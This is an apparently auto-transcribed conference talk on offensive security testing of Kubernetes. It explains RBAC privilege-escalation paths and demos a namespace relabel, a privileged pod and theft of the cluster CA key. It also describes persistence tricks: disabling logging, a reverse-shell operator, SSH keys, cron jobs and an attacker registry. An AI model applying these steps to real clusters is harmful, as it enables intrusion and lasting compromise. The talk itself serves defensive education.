 I will get started five minutes early because knowing me I'm probably going to go slightly over. Hopefully you are all here for an adventure in container security, breaking into Kubernetes clusters. This is I'll let myself in. Very quick introduction. The astute among you may notice that there's only one of me up here. Unfortunately Andy has not been able to join us today so you're stuck with me for the next 35 minutes. I'm Ian. I'm a security consultant at control plane. I am on the offensive security team which means I get to say I'm offensive and not actually offend people I hope. And I have spent the last few years working in penetration testing and breaking into various things over the last five years. Kubernetes clusters, CI platforms, all things kind of DevSec Opsi. So hopefully you're all here to hear something like this. We're going to talk a little bit briefly about what offset is. Hopefully a bunch of people are familiar with this already. If you're not, we'll just define kind of why do we do offensive security? Why do you need it? We'll talk about some common findings. We'll do some demos. We hopefully won't need to resort to the recorded demos. Don't know. We'll find out. And we'll talk a bit about post compromise activities, which is an area that I've seen a lot of people not particularly pay much attention to. And then we'll do another demo hopefully, although I think my final demo might actually be broken, but we shall see. So at a very high level, the problem that offensive security teams are trying to solve is that Kubernetes is complicated. I hope this isn't a shock to anyone. Hopefully everyone knows that it's not the easiest thing in the world to manage. And I don't just mean it's complicated. I mean, if you're an organization who's running Kubernetes or any of these kind of orchestration systems, there are so many moving parts out there. And I genuinely don't think most people know what all the parts do, how they work, how they talk to each other. I think we see a lot of people deploying really complicated solutions to basically host a single web app or to host something that they don't really understand. They're just going, right, this is the cool shiny thing. It's on hacker news. Let's use it. I think that leads to a lot of people running stuff that they just do not know what's happening. There's also the rate of change. I think we're all probably familiar with the relentless release cycle of Kubernetes and how you need to keep up to date, because otherwise you might be trying to juggle the constant patching and release cycle versus actually keeping things running and being able to ingest software fast enough. We see a lot of legacy organizations or places who have kind of more old school software update procedures where that takes you a year to get a new version of something in, by that time, your four versions behind. And the big one that we see really is differing operational requirements. And by that, I mean, depending on your organization structure, you might have different ways that you want to run any cluster. So we see people who use separate clusters for separate environments. So you've got your prod, your staging, your numprod. We also see people who run the same, you know, you've got one cluster, you're trying to make the use of Kubernetes playing that nice little game of Tetris with your hardware, and you think, well, let's just run everything on the same tin. Or you've got people who are literally doing one cluster, one app, let's completely abstract, let's go overboard with the number of clusters we run. And trying to juggle that while maintaining some semblance of security is not necessarily the easiest thing in the world. So that's kind of where offensive security comes in. We're basically doing attacker emulation. We're doing what the bad guys do, but before they do it, hopefully. And we are trying to break into clusters. We're trying to think like a threat actor would. And we're trying to get, trying to get into your clusters effectively. This should always be a collaborative engagement. The least satisfying engagements I've performed in the last few years are the ones where someone says, hey, we're going live on Monday. We need a pen test this week. Make it happen right now. We've built everything. It's all ready to go. And also, you better not find anything because we're going live on Monday. Inevitably, those are the ones where you find a critical at 5pm on the Friday and the go live gets blocked and you're the bad guy. So the more satisfying engagements are the ones where you work with developers, with this admins, and you try and actually help each other out. Security don't want to be the bad guys. We don't want to be the ones that are like, we hate you, because if we get too nasty, people just stop involving security entirely. Then you get hacked. Then you get huge fines. Then everybody's sad. One thing I would like to say is in my mind at least offensive security and threat modelling are different things. So some people think threat modelling, that means that's the attacker's job. I would argue that threat modelling should be part of system design and it should be always what's the worst thing that could possibly happen. Think about that before you start building anything. So the first thing we would generally do, if you've decided right, we've got something ready, we've got it built, we'd like it looked at, is a pen test. And basically, sorry, this bottle doesn't fit on the shelf. And basically, let's try and break in. This is basically security QA. So instead of doing QA and checking that your app doesn't break when you put a letter where there should be a number, we're actively trying to break in. We're trying to go right, let's network scan everything, make sure you've not left anything open, that sort of thing. But ultimately, it is another form of QA. We can do this kind of open box configuration review, you give me all the access, we look at all the things. Or we can do this closed box kind of more representative. So I've got nothing apart from an IP address, have fun, let's see what you can do. Obviously, the less access someone has, the more difficult it's going to be for them to find something which might be a good thing, but it also means you're spending more money for less findings. And also, this tends to be generally noisy and obvious. A quick pen test is not going to be something that tries to avoid detection, it's not going to be something stealthy, it's going to set off all the alerts ever, assuming you've got loggy. But once you've done that, what should you be doing next? Repeating the same operations over and over is boring, but I know personally I've got fed up of just doing the same kind of config review of a very basic cluster. I kind of compare it to when I used to do Windows Active Directory hacking, you kind of go into a network, you're on responder, you get some hashes, you're on bloodhound, you get domain admin, you get bored of it very quickly because you do the same things. So as a consultant, I'm looking for something more interesting to do. And also if you just repeat the same engagement over and over, you're probably going to get the same findings, which is not the most value for money. So purple teaming, I don't know who's familiar with purple teaming as a concept. This is something that is much more interesting to me, working with the team or looking at the logs. So I'm in doing nasty attacker things in your cluster, working with you, making sure that you can actually detect what I'm doing. And again, this has to be collaborative. This can't be I do a job. And then three weeks later, you go look through the logs. This is really valuable for evaluating your response to an incident as well. So it can be done tabletop. It's also more fun to do as a live thing. Let me actually detonate a payload in your cluster, deploy something malicious. How quickly do your team pick it up? Do your team pick it up at all is quite often the first question that we should be asking. But once you've done that, what's your time to respond? So what's your playbook after something bad has happened? And also one of the things that I do like doing is unassumed breach exercise. So let's assume that a developer has been compromised. You give me developer credentials. I use those credentials and I try to escalate my permissions. So ironically, despite this talk being called I'll let myself in, a lot of the time we do request to be let in the front door at least. Basically because in a modern cluster, there's probably not that much immediately accessible from the outside. If you're running a cluster that's got the insecure API exposed now in 2024, you've probably got bigger problems. But also you probably should turn off that API. Some other attack vectors here. So you can think like compromised credentials, compromised laptops, someone's been bribed, you've laid someone off and they've left, or that you think they've left, but actually they still have access. Or someone's checked their credentials into GitHub, which we do still see every so often. So the sort of things we find regularly are almost always a misconfiguration rather than some super cool zero day exploit thing. This might be my favorite slide I've ever written. A foot gun is defined as any feature whose addition to a product results in the user shooting themselves in the foot. Hopefully the admins amongst you won't be surprised that I'm going to follow this up with Kubernetes RBAC. Because basically there's a lot of edge cases, there's a lot of weird interactions, and there's a lot of foot guns in there. So there's a whole bunch of ways basically that can be misconfigured. This QR code is not a Rikral. This QR code takes you to the Kubernetes documentation for RBAC good practices. It's basically a list of ways that various people in the community have seen Kubernetes being misconfigured in a way that leads to privileged escalations. So the big one here to me is secrets get versus list. An awful lot of administrators assume, and I know this is an assumption that's made because someone told me on an engagement the other day, that it's okay to give someone list permissions on secrets because it's only the secret names, you can't get the contents. The difference in Kubernetes is get retrieves a single value, list gets all of them. If you do kubectl get secrets, dash o yaml, you'll get the value of all of the secrets. Now a lot of time when people are testing this, they'll create a secret called test secrets, and they'll go kubectl get test secrets, and it'll say, hey, go away, you're not allowed to get that secret. And admins go, oh, good, the RBAC check worked. I wasn't allowed to get that secret, that's exactly what I expected. Definitely not the case. Pod creation is another fun one. Even if you ignore things like node breakouts, if you can create a pod and you know the name of a secret, you can just mount that secret into your pod. And then you can pipe it out, so you can put it in environment variables, pipe that to base 64, curl it out to a web socket, or something like that. And the other one that I see regularly is the RBAC verb escalate, or people allow RBAC star to an admin, or to a namespace user. And the star includes the verb escalate, which bypasses a check. So effectively people think star just means create, read, update, delete. That's fine. It also includes this escalate verb, which bypasses a check for preventing a user from giving themselves permissions they don't already hold. So if you give someone RBAC star thinking it lets them create, read, update, delete, it also lets them basically get cluster admin very, very quickly. I should say again, none of this is all day, none of this is like super duper hacks. This is all, it's hacks, obviously, but it's all just misconfigurations in the system that exists, which we should be able to demo if the Wi-Fi works. So I'm using Argo CD here as my demo for a CI pipeline that feeds into a Kubernetes cluster. I should say everything I'm about to demonstrate could happen in absolutely any CI system. It could also happen with standard developer access instead of direct QCTL access. This is absolutely not an issue in any particular platform. I just like having a nice web interface to show people stuff. So what I have here is a mouse that I can't find because I can only see that screen behind me. So I have a namespace running in my cluster, and I have just a very basic app set up. So I'm trying to deploy a deployment of Nginx. And I have also deployed a role binding for the user developer to the cluster role view. So we can prove this access. This is going to look horrible on this screen. Basically, this is the output of QCTL auth, can I dash dash list to review my own permissions? And what I'm saying is, okay, I've got all the standard access for the view cluster role, nothing else. Just take my word for it. That's honest what this is. What I'm going to try and do is check in a file to this Git repo that is the cluster role binding to the cluster role cluster admin. So I would like to give the developer user all of the access as cluster admin across the entire cluster. So we'll do a Git add, we'll do a Git commit, and we'll do a Git push. And I might need to authenticate with a key. Yes, I do. Really hoping that that is actually anonymized and you can't see my password. So we should now see Argo pick this up. I'm really hoping this works. If not, I do have this recorded. There we go. Now, there's a couple of things to note here. One of them is that the Nginx deploy is actually failing at the moment. And it's failing because if I go into events, I'm working in a namespace that's labeled with pod security admission restricted. And the default. So I've not added any of my hardening to make sure that my Nginx deployment can run under restricted. So I'm being told basically go away. You're not allowed to run this. And the other thing that I have, it's really hard to see where that cursor is on the far side of the screen is an error in this deployment because Argo CD, this project I'm deploying in is configured to not be allowed to create cluster-wide resources. I'm only allowed to create namespaced ones. So I'm not allowed to create a cluster rule binding. So that's a good thing, right? That means I can't assign myself as a user permissions across the entire cluster. I'm just going to terminate this sync because basically if I don't terminate that one, it hangs forever and it's really horrible. And then we'll do something else instead. So I'm just going to remove the cluster rule binding and hopefully this syncs fairly quickly. Let's just close out and demo. Basically, I just need to be sure that that's gone, otherwise the future syncs don't work. There we go. That's gone. What I'm going to do now is instead of creating a cluster rule binding, I'm going to have Argo create for me a rule binding to the cluster rule cluster admin. So as you can see, developer user rule binding cluster admin. For those of you who are not aware, a rule binding to a cluster rule assigns all of the permissions that that cluster rule has but only in a single namespace. So we can demonstrate this. This should deploy fairly quickly. I'm also really surprised that this is actually running. I did wonder if I would have to host some horrible get thing locally to make this work. So what we should see now is that rule binding has successfully been created. So I now have as the developer user, the permissions star dot star in my own namespace. So I'm just going to demonstrate that with another Qubectl off can I and effectively somewhere up here. So you can see at the top there, I've got star dot star. That means I can do anything I want, but only in this one namespace. We'll also ignore that Qubectl get pods because I just realized why that's, let's just pretend that's not there. I made last minute changes to this and didn't run it. That was slightly awkward. So effectively, I have star dot star in my own namespace. This isn't an escalation that I found recently that I was genuinely surprised by. This is working as intended by design. If you have star dot star any namespace with a rule binding, not a cluster rule binding, you can modify the labels on that namespace. Now that's probably okay if you want to label your namespace as, oh, this is my production namespace or whatever label it is. I've deployed this app. However, loads of Kubernetes security stuff now relies on labels on a namespace as a security boundary. So one of them is network policies saying allow access from a label up a namespace with a certain label. The other one is the pod security admission and the pod security standards rely on labels on namespaces. So if I can modify the labels on any namespace, I can just say it's right. Forget about what you said about this being a restricted namespace. Just use the privileged one. So I've done that. I've labeled my demo namespace. I'm now going to deploy. This is hopefully familiar to some of you in the audience. This is a manifest which basically turns off all of the security ever. So this is going to deploy a pod which uses the privilege security context. I'm using the image engine X just because it's got a load of tooling in it. But I'm also going to mount in a bunch of host resources. So I'm going to include the host file system and a couple of other bits. So I'll do a kubectl apply. This definitely would not have worked if I was running under pod security restricted. It would go away not allowed. However, that pod has been created. I'm going to stall for about five seconds to make sure there's enough time for that image to pull before I do my next command, which is to exec into the container that was just created, still is the developer user only with permissions in one namespace. And I'm going to cat from slash host. So this is actually the node the pod is running on. This is the certificates authority that Kubernetes uses to sign all of its user certificates among other things. And look at that. There's the key. So with this access, I can now mint my own certificates, which is not great. I hope you would all agree. That's probably not a good thing to allow a random developer to do in your cluster. So there we go. We've had a namespace. We've broken out. And what we should also see, ah, we haven't. I was wondering if that deployment would have spun up, but it's not yet. So now that I've broken out, what would I do next? And this is a really interesting conversation and what I hope is the most important message of this. Once I've broken out from my namespace, what do I do next? If I'm actually an attacker, what am I going to do? And the answer is probably quite a lot. So I'm definitely going to try and hide my tracks. If I've got admin, I'm probably going to try and disable any auditing and logging and monitoring. So first of all, what are you actually auditing? Are you doing enough to detect me doing malicious things in your cluster? Can you pick me up in the first place? The chances are if you've got auditing on, then you've probably caught me doing something. But if I'm a committed attacker and I've thought about what I'm going to do once I get in, the first thing I'm probably going to do if I can is disable all of your auditing entirely. So I might change the system configuration to delete the auditing. Or one of my favorite tricks is if you are streaming your logs to an extra source, if you're sending them out through something like some remote logging solution, and you're doing that by host name, I'll just change the value for your logging server in Etsy hosts to something that doesn't exist. At which point, all of your logging goes, well, I can't get there anymore. And if you don't have a canary in your auditing, in your monitoring software to say, have I still got logs, you probably won't even notice that your logs have stopped. You definitely won't be able to tell what I've done after then. There are also various endpoints once I've got admin that I could make use of, which are not audited by default. So an example would be what if I start talking directly to the cubelets, or what if I start doing things on a node, which are malicious, but you're only logging the Kubernetes API. So you're not actually taking system logs from each of your nodes. The other thing that I really like to kind of use as a thought exercise is if you've got an attacker in your cluster and you're an admin, can you get rid of them? I would argue that the answer is probably no, not with any degree of certainty, unless you are absolutely able to completely lock down your entire cluster and everything it touches, which is quite a big ask for a production environment. If someone has got admin, they can mint their own certificates, they can compromise the nodes directly. There's a whole bunch, let's go through some of them. I'm not going to list all these options because we would literally be here all day. This is a multi-day presentation if I try that. But in Kubernetes, for example, I could mint user certificates so I can just keep hold of my own, make my search for system masters. I could talk directly to XED because I've got access to the certificates that work there. If I can talk directly to XED, I almost want to do a show of hands. Does anyone actually audit the calls that go between a node and XED? I guarantee you there's like maybe two or three people in here who actually do that. Most people won't. Crafting your own service account tokens, creating some dodgy RBAC, creating a workload in the static manifest directory, so XE Kubernetes manifests. You can create workloads in there that are going to be extremely difficult to find, especially unless an admin goes in specifically looking in that location. You could also talk directly to the container runtime. So you could just say, right, don't create a pod. Just create another process that's running on the node. You could do a malicious admission controller or a malicious operator that creates your persistence for you. So if I create a thing in the cluster that just goes, I always want one reverse shell back to Ian's dodgy server, please. And if the admins ever recognize a node's been compromised, quarantine that node, the operator itself might go, oh, I'll just make another one of them. That's fine. And even if you remove all of the Kubernetes attacks and so on, ultimately, we're going to pretend that any serverless stuff doesn't exist. And we're going to pretend that Windows nodes don't exist. You've still got all the Linux persistence. So another QR code there. I will publish these slides later. This is the MITRE attacker persistence techniques. The link takes you to, but just to give an example of some of these cron jobs on a node. So just have a task that runs regularly, dropping SSH keys on the node. So if I just go, right, I'm going to put my SSH key into the root user on all of the nodes. Now I can SSH in directly modifying the container runtime. So one, one nasty thing that someone might do is change the registry search order on your, your cluster so that instead of going to Docker hub first, people, your, your nodes go straight to like attacker.registry.registry.attacker.com, pull all your backdoored images from there. Potentially also doing things like implanting into cloud storage. So I was having a conversation with a customer a while back and they said, oh, it's fine. We'll just detach all of our EBS volumes, spin up a new cluster, reattach the volumes. The problem is if an attacker has gotten to the point that they've got root on every node, they are also going to be able to put stuff into your persistent storage. And if you take that storage across, sad times. Very quickly do one more demo, which I really hope works. Hey, that deployment's worked. Look, happy days. Well, that says it's happy. That says it's sad. I will check that later. So what I'm doing now is copying a persistence.sh script into my dodgy pod. And I'm going to run that script, which is going to do a few things very, very, very, very quickly. Or it's just going to fail. Let's do that manually. I knew it was going too well. Cube CTL exec. So that script, which ran extremely quickly. In fact, let's just look at the script. Persistence. That script, which did go very quickly, dumped all of the secrets from the Kubernetes API. Cube CTL gets secrets, dash A, dash O YAML, into a file. Grab the CA.key and CA.cert. And I also grabbed the C Kubernetes admin.conf, because this is a kind cluster that's running QBADM effectively. I've grabbed the hard coded admin cert for that cluster, which is valid for at least a year in some deployments, possibly up to 10. I then added an ssh key to slash root slash ssh slash authorize keys. And I added a cron job to do something dodgy.sh, which might be my favorite script. This all ran in about a second. My argument here is these are a few persistence mechanisms. I've not done loads. Oh, I also was trying to get this working, where I was going to get it to send me something over a web hook and the conference Wi-Fi just cried, so I did not do that. Unfortunately. The point here being, that ran exceptionally quickly. I would argue that the time to response from your cluster monitoring going, hey, something dodgy's happened to a human being getting the alert, pulling out the phone, checking it, getting onto the laptop, realizing what's happened. I don't think any organization can do it faster than that script ran. I would be amazed if you can. Let's face it, realistically, we're probably talking minimum of half an hour, realistically up to days. I had a customer ring me a while back and say, hey, we've just caught your DNS tunneling that you're doing. That's fine, but the job was three weeks ago. All of that data left your organization three weeks ago, and you're now telling me really proudly that you've caught it. Good job. So the real take on from this, there's some cool breakouts you can do. There's some cool persistence you can do. The thing I would like everyone to think about, because obviously we need a call to action, is if you ever get an alert that says, hey, this canary tokens triggered, or you get something that says, hey, we've had horrible, horrible hacks happen against us, what would you do if you find evidence that an attacker has had cluster admin for even half an hour? Because I don't think a lot of organizations are in a position where they could genuinely recover from that very quickly, very easily, and with a high degree of certainty that they have actually got the attacker out. And the other thing to think about, if you're one of the organizations who's got everything as infrastructure as code, and you can just delete all of your infrastructure and rebuild, that's fine. But what happens if you just deploy the exact same stack, the exact same software with the exact same entry point, and your attacker just does the exact same thing all over again? Because the chances are, if you've got a web app vulnerability that was their entry point, and you just go, oh, we'll deploy a clean cluster, they're just going to do dot slash something dodgy dot show, and they'll be in the exact same position all over again. You also need to think about not just the Kubernetes cluster, but every credential stored. So if an attacker's got in and they've dumped all your credits, they might have access to your on-prem identity provider, if you're using something kind of OIDC authentication-y, they might have access directly to your databases, they might have cloud credentials. The blast radius of this can be fairly catastrophic, which again brings us back to when you're designing and threat modeling, have a think about what is the worst that can happen. And I would really encourage everyone to have a think about what would happen if someone got admin, or if you're kind of, what's your joiners and levers process? It doesn't have to be an attacker. What if you sack an admin, and they had access before you got them out? So that's it. I think I'm pretty much on time, having used a couple of extra minutes. Hopefully that was interesting. If you want to practice some of the stuff we've spoken about, we are running a cap to the flag. We're doing a practice session tomorrow, and we're doing a live session on Friday. I would highly recommend if you're interested in the offensive security stuff and you want to have a playground, come and join us in room W08. Hopefully I'll see some of you there, and thank you very much for listening.